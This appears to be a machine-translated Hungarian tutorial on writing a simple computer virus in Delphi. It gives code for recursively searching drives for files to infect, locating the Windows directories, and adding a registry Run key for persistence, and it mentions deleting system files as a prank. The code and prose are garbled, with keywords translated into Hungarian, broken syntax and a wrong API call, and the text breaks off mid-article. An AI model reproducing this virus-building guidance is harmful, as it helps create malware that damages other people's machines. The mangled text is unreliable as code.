Vírusos hello world
Azt hiszem, már hallottam ilyen irányba a modern underground színtér VX-kódolás. VX jelenti Virus csere, ami azt jelenti, hogy a VX-kódolók urak foglalkozó írásban vírusok, férgek és más „önreprodukáló mechanizmusokat.” Itt látható a megfogalmazás samorazmozhayuschegosya mechanizmus (CM) a SGWW (Stealth Group World Wide): «A végrehajtható kód, amely az önálló szaporodásra. SM az egyetlen terület tiszta programozás, és ellentétben más számítógépes programokkal, végezze a szellemi funkciók a harc a túlélésért nehéz körülmények között ellentétes számítógépes rendszerek. " Itt ma fogunk csinálni a teremtés ez a „végrehajtható kód” =). Az első ismeretség a technológia vx-programozás, nem fog menni a polimorfizmus permutációs kódot,
stb és írj egy programot, amely fut a Windows és OC össze az összes vonatkozó minimális követelményeket egy egyszerű vírus, egyfajta Hello World :-). Először is mi kell érteni, hogy képes lesz az első Vir:
1. láthatatlan és szaporodását a fertőzött gépen.
2. Fertőzés a szükséges fájlokat.
3. Tetszőleges lehet tréfás, meghatározott intézkedéseket sozdatelm vírus. Például messagebox'a megkötésére bizonyos időpontban, az operációs rendszer 😉 kíséri eltávolítása rendszerfájlok (ez persze egy vicc, törölje információ helytelen - ne feledjük, hogy 😉
Vágjunk bele. Mint fejlesztési környezetet választottam, Delphi, mert Pascal kód egyértelműnek kell lennie, még azoknak is, akik semmit sem tudnak programozás.
Project -> Forrás megtekintése. Itt távolítsa el az összes felesleges, hogy a következő:
programot helloworld;
felhasználások
ablakok, sysutils, registry;
Most, hogy. Keresni a fájlokat, meg kell írni egy kis eljárás:
eljárással Keresés (d: string);
var
sr: tsearchrec;
st: string;
kezdődik
ha findfirst (d + '\ *. *', fadirectory, sr) <> 0, akkor // Ha nem található
findclose (sr) // megáll keresés
mást // különben
ismételje // továbbra ameddig findnext (sr) <> 0
st: = d + '\' + sr.name; // kiegészítik a teljes fájlnevet
ha sr.attr <> fadirectory majd // ha nem találta meg a mappát, és a fájl
kezdődik
// Mi köze a talált fájlokat?
végén pedig // ha a mappa
kezdődik
if (sr.name <> '') És (sr.name <> „..”), akkor // ha a mappa a mappában a (dir)
Találd (st); // a keresés elindításához benne
végén;
amíg
findnext (SR) <> 0;
findclose (SR);
végén;
Nos, most meg kell jegyeznünk =).
A folyamat létrehozása a vírus, szükségünk van a könyvtárban, ahol a Windows van telepítve, és a rendszer könyvtár. Mi határozza meg a következőképpen:
var
WD: array [0..max_path] char;
SD: array [0..max_path [char;
kezdődik
getwindowsdirectory (wd, max_path); // változó wd írja le az utat, hogy a könyvtárba, ahol a Windows
getwindowsdirectory (sd, max_path); // változó sd levelet az utat a Windows rendszer könyvtárába
végén;
Azt is meg kell regisztrálni robotpilota (például a registry):
var
R: tregistry;
kezdődik
r: = Tregistry.create;
r.RootKey: = HKEY_LOCAL_MACHINE;
ha r.OpenKey (\ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run”, true)
majd r.WriteString ( 'vx32dll', path_to_virus);
végén;
Itt található az ezt a cikket egy ismerősének: